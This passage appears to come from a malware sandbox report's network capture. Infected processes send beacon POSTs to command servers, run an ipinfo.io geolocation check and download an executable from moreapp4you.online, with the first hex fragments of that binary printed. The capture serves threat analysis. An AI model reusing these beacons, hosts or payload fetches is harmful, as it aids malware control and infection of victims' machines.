r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:12.151444912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.7	49907	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:11.412066936 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:12.076222897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:12.155008078 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 06:00:12.379980087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.7	49908	78.89.199.216	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:12.340636015 CEST	275	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jsgiejdepkhcrdfn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 199 Host: movlat.com
Jun 27, 2024 06:00:12.340647936 CEST	199	OUT	Data Raw: 3b 6e 58 65 8c c9 61 56 da a2 c3 73 77 01 7e bb 7a 0e cd e7 62 76 e3 67 0e 08 0e e5 40 c2 c3 1a ed 5c c2 20 02 6a 24 6c ec 97 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 3a 4b b9 b7 Data Ascii: ;nXeaVsw~zbvg@\ j$l?=8kI?pLM@NA -[k,vu:K`BkQArdh=uehJV4-<'>BR[ob=Q{5N>h#KA
Jun 27, 2024 06:00:13.415199995 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 27 Jun 2024 04:00:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.7	49909	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:12.440335035 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:13.038711071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:13.070378065 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:13.267436981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.7	49910	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:12.617186069 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:13.253411055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:13.491405010 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 06:00:13.713495970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.7	49911	78.89.199.216	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:13.544728041 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qatofyvedbjn.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 155 Host: movlat.com
Jun 27, 2024 06:00:13.544754982 CEST	155	OUT	Data Raw: 3b 6e 58 65 8c c9 61 56 da a2 c3 73 77 01 7e bb 7a 0e cd e7 62 76 e3 67 0e 08 0e e5 40 c2 c3 1a ed 5c c2 20 02 6a 24 6c ec 97 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 55 5c be f7 Data Ascii: ;nXeaVsw~zbvg@\ j$l?=8kI?pLM@NA -[k,vuU\PCU@XX]1K,iwZvuW+0QCo1
Jun 27, 2024 06:00:14.636143923 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 27 Jun 2024 04:00:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.7	49912	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:13.803191900 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:14.414335966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:14.506352901 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:14.700644970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.7	49913	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:14.100339890 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:14.769392967 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:14.835741997 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 06:00:15.058830023 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.7	49914	78.89.199.216	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:14.700140953 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://epjixufpeitkhc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 343 Host: movlat.com
Jun 27, 2024 06:00:14.700153112 CEST	343	OUT	Data Raw: 3b 6e 58 65 8c c9 61 56 da a2 c3 73 77 01 7e bb 7a 0e cd e7 62 76 e3 67 0e 08 0e e5 40 c2 c3 1a ed 5c c2 20 02 6a 24 6c ec 97 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 27 25 ac 80 Data Ascii: ;nXeaVsw~zbvg@\ j$l?=8kI?pLM@NA -[k,vu'%gtg^S=uv:@Vt,IJGO4\|9Q9ZEZE:5ww[y%&a1*TZGJ@&]v
Jun 27, 2024 06:00:15.791243076 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 27 Jun 2024 04:00:15 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.7	49706	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:58:07 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-06-27 03:58:07 UTC	513	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 27 Jun 2024 03:58:07 GMT content-type: application/json; charset=utf-8 Content-Length: 319 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-27 03:58:07 UTC	319	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49709	31.31.196.208	443	6620	C:\Users\user\Desktop\1Vkf7silOj.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:58:32 UTC	78	OUT	GET /George.exe HTTP/1.1 Host: moreapp4you.online Connection: Keep-Alive
2024-06-27 03:58:32 UTC	253	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 27 Jun 2024 03:58:32 GMT Content-Type: application/octet-stream Content-Length: 5037056 Connection: close Last-Modified: Sun, 23 Jun 2024 09:17:41 GMT ETag: "4cdc00-61b8b22f50470" Accept-Ranges: bytes
2024-06-27 03:58:32 UTC	16131	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 56 e8 72 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 bc 03 00 00 c4 08 00 00 00 00 00 e8 2e 69 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 81 00 00 04 00 00 20 92 4d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 35 3a 00 a0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELVrf.i@ M@5:
2024-06-27 03:58:32 UTC	16384	IN	Data Raw: 00 00 00 00 00 f4 2f 7c 0e 04 bd b7 6d 68 59 6b 90 2c 29 32 0f 1e 14 0e 53 02 40 da 76 46 b5 ce 12 c9 9d 28 d9 42 39 9d ad 7e 05 20 11 d3 49 dd c7 18 e7 dc 79 44 1e 91 c3 e6 59 64 59 7b 6f 72 0f 75 9b 25 e7 97 6a d7 3d 27 82 e6 24 69 26 7a e7 8f ed f9 84 39 e3 7f 82 98 44 2d 05 8a a9 29 38 cb c3 f0 28 96 b9 85 f6 34 03 26 23 3a b0 62 e9 2c 61 0e 54 a8 ac fb 66 15 dd 3e 35 cf ac cb 5f d0 59 e2 b7 9f 4d e9 2c 61 0e 1b 39 4b 9d 37 ab 26 d2 0b 8b 5a 2e 90 d9 05 c3 41 99 ea bd b7 4d e9 2c 61 0e 91 6d 0f 74 53 61 da a2 e5 e7 9b a5 5e fb 93 28 94 4d e6 f3 c1 e1 1b 3d 1f 34 49 a2 8b 6e c2 a2 61 78 64 e5 e6 f3 c1 e1 1b 2b d7 a5 88 c7 cb 59 36 4d 37 13 f8 fd b0 27 f3 c1 e1 1b f0 d2 b0 68 2b ef 29 69 b7 eb ff 99 6d 7c f0 f3 c1 e1 1b dd 21 25 f6 e2 3e da 9e 18 94 e7 Data Ascii: /\|mhYk,)2S@vF(B9~ IyDYdY{oru%j='$i&z9D-)8(4&#:b,aTf>5_YM,a9K7&Z.AM,amtSa^(M=4Inaxd+Y6M7'h+)im\|!%>
2024-06-27 03:58:32 UTC	16384	IN	Data Raw: 43 72 5d 29 40 e5 7c bf 27 9b 5a ff 0f 96 41 f2 53 80 0d 5e 19 7d 18 76 e1 93 22 c4 0d e8 5f 12 05 51 32 d9 8d 4c 0c 0c 68 8e d7 bd f5 89 01 f6 54 24 00 68 1b 04 09 16 8d 64 24 14 e9 44 58 07 00 4d 8b 0e e9 61 37 41 00 8d 64 24 0c e9 b9 8d 08 00 bd 8e aa 3e a1 c1 e5 03 0f bf cd 8b 94 ef 80 5c 55 b0 0f 8a 6b dd 08 00 8d 84 49 83 42 b9 a0 0f 87 96 81 3f 00 8d bc ef 84 5c 55 b0 8d b5 03 91 bf a0 8b f2 66 81 c5 87 96 99 0f 8c f4 c2 04 00 b8 a2 c5 24 0f e9 41 92 11 00 68 87 92 9c 86 66 d1 c2 e9 6e 1d 3e 00 be bb 01 2f ff e8 42 a2 01 00 b8 86 43 ac 4f 66 c1 e0 47 8b 84 05 00 3d 53 b0 0f 8a 2a b2 0c 00 68 2a 07 35 6f 48 8d 64 24 18 e9 a6 c8 3a 00 32 d8 f6 54 24 13 81 ee 02 00 00 00 e8 25 c9 39 00 e8 db 7f 01 00 66 f7 d2 e9 75 a4 4a 00 89 94 0c b3 4e 48 be 51 f7 Data Ascii: Cr])@\|'ZAS^}v"_Q2LhT$hd$DXMa7Ad$>\UkIB?\Uf$Ahfn>/BCOfG=Sh5oHd$:2T$%9fuJNHQ
